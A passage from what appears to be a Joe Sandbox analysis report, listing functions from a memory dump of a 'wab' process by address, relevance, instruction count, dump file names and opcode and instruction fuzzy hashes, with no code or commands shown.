                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0825fcd3a934ca50906c72d5ec04b0143f1a8a90fc33425823a7573da31a1c3c
                    • Instruction ID: d952d62ab057f599844426f86ff5c0b8ddbe963c4db2c05ce356b6ccef28cfe4
                    • Opcode Fuzzy Hash: 0825fcd3a934ca50906c72d5ec04b0143f1a8a90fc33425823a7573da31a1c3c
                    • Instruction Fuzzy Hash: A071F132200711AFE72ACF1AC840F56BBE6FF41764F12453CE65A8B6A0DB74E945CB90
                    Function 21378AA0 Relevance: .2, Instructions: 197COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d9f4eca533ad7a5253d5a48e12fd0dc95991897651c0e28a0deb96e950488d45
                    • Instruction ID: 16ddad4650b004dc0a3b971c13bdc515d24e98929a505b29761429ea5ac3d7c4
                    • Opcode Fuzzy Hash: d9f4eca533ad7a5253d5a48e12fd0dc95991897651c0e28a0deb96e950488d45
                    • Instruction Fuzzy Hash: 4281BC73A0435A8FDB05CF98C494BAEB7B7BF49318F55416DE904AB291CB389E41CB90
                    Function 213ACDB1 Relevance: .2, Instructions: 197COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f32f934a1b6a8d65a7d09717028e821ad50053a2a52cb23b29cccc75af629435
                    • Instruction ID: c230170392140a635cdc210693db3d38e9ce8c314fb88235a485ab4c61179989
                    • Opcode Fuzzy Hash: f32f934a1b6a8d65a7d09717028e821ad50053a2a52cb23b29cccc75af629435
                    • Instruction Fuzzy Hash: D961A371E0021ADFDB09CF68C494EAEB7BAFF09318F114179E619EB291DB319901CB50
                    Function 2139CDF0 Relevance: .2, Instructions: 165COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                    • Instruction ID: bcbdf458a5f22ad250ab078d073212b4ed289af773d2df5a5679db2b6d8a5e68
                    • Opcode Fuzzy Hash: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                    • Instruction Fuzzy Hash: 10513C77E0060ADFDF04CFA8C581ADDBFF6FB49319F2581B9D916AB240D634AA418B50
                    Function 21418350 Relevance: .2, Instructions: 161COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 77a6ed7024d65fe0ffdd4f883dce266e3b3885242f139bd9f69237636d67d9b0
                    • Instruction ID: 31e38639486da374dd898b264002d591c95320146a7af8c300ce1d3c6d4a5c8c
                    • Opcode Fuzzy Hash: 77a6ed7024d65fe0ffdd4f883dce266e3b3885242f139bd9f69237636d67d9b0
                    • Instruction Fuzzy Hash: F251C17090070ADFD721CF56C880A9BFBF9BFA5710F10472ED29A976A4DBB0A641CB50
                    Function 213AE443 Relevance: .2, Instructions: 158COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fe2da265178bc2b5623ceaad4b58d9b1c1cf4b60b2352ab092b70a1c854415c4
                    • Instruction ID: 93b96fad6dbf80b108f1268b6d3261ca11a20dbd4760d6841c6736e0eab57e1b
                    • Opcode Fuzzy Hash: fe2da265178bc2b5623ceaad4b58d9b1c1cf4b60b2352ab092b70a1c854415c4
                    • Instruction Fuzzy Hash: C8518C71600A19DFCB22DF69C984E9AB3FEFF15788F51042AE58597660E734EA40CB50
                    Function 21414180 Relevance: .2, Instructions: 156COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b72a8ffdcd7f7ecd6935983db7f2a574e1140e70167c62fc48b5026504f91416
                    • Instruction ID: e5817007609348961dce2c0928a9d83700e042be230a2c40785ecbbbcf9b7bae
                    • Opcode Fuzzy Hash: b72a8ffdcd7f7ecd6935983db7f2a574e1140e70167c62fc48b5026504f91416
                    • Instruction Fuzzy Hash: 5A5157716083069FD744CF69C880A6BB7E5BFD8718F88492DF589C7254EB30DA05CB52
                    Function 213945B1 Relevance: .2, Instructions: 156COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                    • Instruction ID: 3e5e0786300d5f28a0fbfbe3e029cbab7007c09ee63a31b83d992bd394e0ad50
                    • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                    • Instruction Fuzzy Hash: A4517172D0021E9FDF15CF98C550BEEBBBAAF45768F00406AE915AB250D734DE44CBA0
                    Function 213FE9E0 Relevance: .2, Instructions: 154COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                    • Instruction ID: 8023aa691b612476003234ce9df9181fbbe63e76e03d0cd7fb30773fcfcb4434
                    • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                    • Instruction Fuzzy Hash: A551943190421EAFEF118F94C890F9EBBFBAB0136CF324679D52A67190D7749E4487A0
                    Function 213FCBF0 Relevance: .1, Instructions: 148COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 98538a85e57a0c87b76e5a3a1302e15876a5f68262509a28e87a14655c842840
                    • Instruction ID: 68753e154956bdca1d4019b26f340312f59647fab897ba8289b43b77e22f4e4e
                    • Opcode Fuzzy Hash: 98538a85e57a0c87b76e5a3a1302e15876a5f68262509a28e87a14655c842840
                    • Instruction Fuzzy Hash: 16517E7294021ADFCB10CFA9C580E9EBBBAFF4935CB114519E50AA7751DB34AE01CBD0
                    Function 213AA430 Relevance: .1, Instructions: 139COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ca93e80e19ba24db26c0e5d677aa55791d9feb340653d6836b21313fbb7515a5
                    • Instruction ID: 736ccaeee605c7e98823ba9c6db09cfd9f79ff362e126477695f49d22e0b0e76
                    • Opcode Fuzzy Hash: ca93e80e19ba24db26c0e5d677aa55791d9feb340653d6836b21313fbb7515a5
                    • Instruction Fuzzy Hash: 904126726803569FDB09DF6CC880F5A376BEB5571CF01042DEE4AAB252EBB59900CB91
                    Function 2143A9D3 Relevance: .1, Instructions: 139COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                    • Instruction ID: 4d5fbadbe37b6f60ee3073d6ba756ef82ec987a2a2aed94eb89556d882759f70
                    • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                    • Instruction Fuzzy Hash: 6941D3326406169FD719DF24C884A5AB7A9FFD9314B35462EE91987740EB30ED06CB90
                    Function 213A01F8 Relevance: .1, Instructions: 138COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ac4a7e3187eb24c64948b5164654b55787f93d068a1098dba2b9d0f58d19a8fe
                    • Instruction ID: 952c2beca09fbec7be32dc27166b534af1c56832822d8c59f42e88444cfbcb63
                    • Opcode Fuzzy Hash: ac4a7e3187eb24c64948b5164654b55787f93d068a1098dba2b9d0f58d19a8fe
                    • Instruction Fuzzy Hash: E941BB36A01219DBDB04CFA8C440AEEBBBAFF4D718F10816AE815F7240E7359D41CBA4
                    Function 213B2750 Relevance: .1, Instructions: 137COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                    • Instruction ID: 792ee78a4626b2dd376a656dbc51a9e6ea23e996847df923ca0da60909698ab0
                    • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                    • Instruction Fuzzy Hash: B2515A75A00629CFCB05CF98C484AAEF7F6FF85714F2481A9D919A7351D770AE82CB90
                    Function 21376154 Relevance: .1, Instructions: 133COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5c04c9aedbdcda24db66229c500aea1775b78f243f6dd05c8f09563f8c917721
                    • Instruction ID: 28f7a6b2ed42ac3e8dafe210af40b1220f71067c2682f527eca5d83abad40acb
                    • Opcode Fuzzy Hash: 5c04c9aedbdcda24db66229c500aea1775b78f243f6dd05c8f09563f8c917721
                    • Instruction Fuzzy Hash: DF51D9B194025ADFEB558B28CC10BD8BBB6FF1531CF1082A9D519976D1D7385982CFC0
                    Function 21370D59 Relevance: .1, Instructions: 130COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 88d34453b95ba8dd19962697902777c6542bc81bc404306965048af84be4f593
                    • Instruction ID: 2257c1c239d8bcd7aff08d7e77fd470d48162aa140a96019d8ced877585a5c3c
                    • Opcode Fuzzy Hash: 88d34453b95ba8dd19962697902777c6542bc81bc404306965048af84be4f593
                    • Instruction Fuzzy Hash: B141B371A007589FEB21CF24CC80F9A77BBAB56758F0004A9E949DB681D778EE41CB51
                    Function 2143866E Relevance: .1, Instructions: 129COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                    • Instruction ID: 4bc15747f76a43621c7c18c785b275e9399215f30b60048eedf8777f7277f604
                    • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                    • Instruction Fuzzy Hash: C4417175B00106ABDB05CBA5CC90AAFFBBAAFD9750F20417DE50897341D774DE158760
                    Function 21370887 Relevance: .1, Instructions: 128COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ede9c8ca99539825b6fe2acf4c9d0cb0bfc21d60f08c25c5af1ae7afedb564f9
                    • Instruction ID: fdb23ea83f5e5a7d8852d911b08e7a729f353559f2e839dc6bb6a41221237e6f
                    • Opcode Fuzzy Hash: ede9c8ca99539825b6fe2acf4c9d0cb0bfc21d60f08c25c5af1ae7afedb564f9
                    • Instruction Fuzzy Hash: 3041B6B16107059FD325CF28C480A16BBFAFF4B31CB10896DD55787A61E734E946CB90
                    Function 21378BF0 Relevance: .1, Instructions: 124COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4671f2f7baeb653c69db938641c4f0ced92742b827c5e9cdffc9d89044eaf028
                    • Instruction ID: 226d3a84aaa36bda628ef8b32cddb209dad21194efd53b0b823047b11a67ce6c
                    • Opcode Fuzzy Hash: 4671f2f7baeb653c69db938641c4f0ced92742b827c5e9cdffc9d89044eaf028
                    • Instruction Fuzzy Hash: C8411432901246CFDB198F58C890AAABBBBFB9570CF55807DD9059B255CB39D902CB90
                    Function 21368918 Relevance: .1, Instructions: 123COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7333f8619ea3564191904e743d3cefe210f7125f1c2eaaf515f2c3158b33812e
                    • Instruction ID: 38372b55fb7fae3b22f17464715c9631a676b936defb9de94ee1ff6a9093a9e5
                    • Opcode Fuzzy Hash: 7333f8619ea3564191904e743d3cefe210f7125f1c2eaaf515f2c3158b33812e
                    • Instruction Fuzzy Hash: 38416F315083469ED312CF69C840A9BB7EEEF89B98F40096EF994D7250E771CE448B97
                    Function 2136A020 Relevance: .1, Instructions: 122COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                    • Instruction ID: 29c769aefc4039a978fe82350e7f8d4ab36ddde236480cc2498de4ff373ee8d5
                    • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                    • Instruction Fuzzy Hash: AD416C31A04256DFDB11DE248440BEA7B7FEB52B9CF11806EE9458B34CD6329EC4CB90
                    Function 213709AD Relevance: .1, Instructions: 122COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 973fa992da8ab50e71ff92ca2ac4ebbbdb4a50cbf79de0a39c1764c291fea156
                    • Instruction ID: 90e581bc95866e6cf2b55e0232b852c6c48272d046c1a328e2016f88c5e36873
                    • Opcode Fuzzy Hash: 973fa992da8ab50e71ff92ca2ac4ebbbdb4a50cbf79de0a39c1764c291fea156
                    • Instruction Fuzzy Hash: 56416AB1640701EFE311DF18C880B16BBFAFF5A718F21866AE449DB251E775E942CB90
                    Function 213A0710 Relevance: .1, Instructions: 121COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                    • Instruction ID: 63680bf717745c3c7933bbe8fabfaa8122be562ded93003e093d04a6b6b84723
                    • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                    • Instruction Fuzzy Hash: DF416A71A00705EFDB24CFA8C990A9ABBFAFF18704B10496DE156D7690D331EA44CF90
                    Function 2137262C Relevance: .1, Instructions: 119COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 890b87f197952a3ad54f0cd3a12e77bd4eabba953374497a1f6a67ff6b1360a1
                    • Instruction ID: 781155c118eaafbea50525cd74dfc24e6d15e17a687530a8a3c728c785585e4c
                    • Opcode Fuzzy Hash: 890b87f197952a3ad54f0cd3a12e77bd4eabba953374497a1f6a67ff6b1360a1
                    • Instruction Fuzzy Hash: 0441A3B1501745DFC711DF29C940A45B7FBFF5532CF10816AC41A9B2A2EB34AA42CF91
                    Function 213AC8F9 Relevance: .1, Instructions: 116COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3446bf31892e9a14ec5af7be6829e2477ffdcd1786542368fce052fb70dc28bf
                    • Instruction ID: 1dc23a1efae3126acdc85cbdec82698155c69edc73720912f30f85e933edcfcd
                    • Opcode Fuzzy Hash: 3446bf31892e9a14ec5af7be6829e2477ffdcd1786542368fce052fb70dc28bf
                    • Instruction Fuzzy Hash: 87317AB2900349DFEB01CF68C540799BBF6FB09728F2081AED519EB251D7369A02CF90
                    Function 213F07C3 Relevance: .1, Instructions: 114COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
